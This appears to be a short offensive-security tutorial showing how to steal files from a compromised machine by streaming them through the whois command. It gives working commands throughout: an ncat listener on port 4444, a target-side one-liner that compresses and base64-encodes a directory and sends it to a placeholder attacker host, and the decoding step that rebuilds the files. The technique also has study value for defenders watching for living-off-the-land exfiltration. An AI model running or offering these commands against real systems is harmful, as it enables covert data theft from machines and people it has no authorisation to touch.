Sometimes you may want to transfer (juicy) files from a remote system (that you’ve pwn’d, for instance), just to find that you have limited resources.
What could you do ?¶
I’ll show you how to, using Whois command.
Let’s see…¶
STEP 1
On Attacker’s Terminal
, type:
ncat -k -l -p 4444 | tee files.b64
Ncat to listen to connections from a target’s machine through port 4444.
Then Tee to a file so you can make sure you have it.
On Target’s Terminal
, type:
tar czf - /path/to/directory/* | base64 | xargs -l 2048 timeout 0.03 whois -h attacker.machine.IP -p 4444 2048
Compress the directory you want to transfer and encode it to base64.
Then Send 2048 bits of data to attacker-machine through port 4444 with a timeout of 0.03 using whois command.
STEP 2 (Final)
On Attacker’s Terminal
, type:
cat files.b64 | tr -d '\r\n' | base64 -d | tar xvz
Read the file with a base64 encoded tar archive file (files.b64).
Trim / delete all “\r\n”.
Base64 decode the piped standard output from files.b64 file.
Then untar the archive to retrieve the files.
Thanks, made by ❤️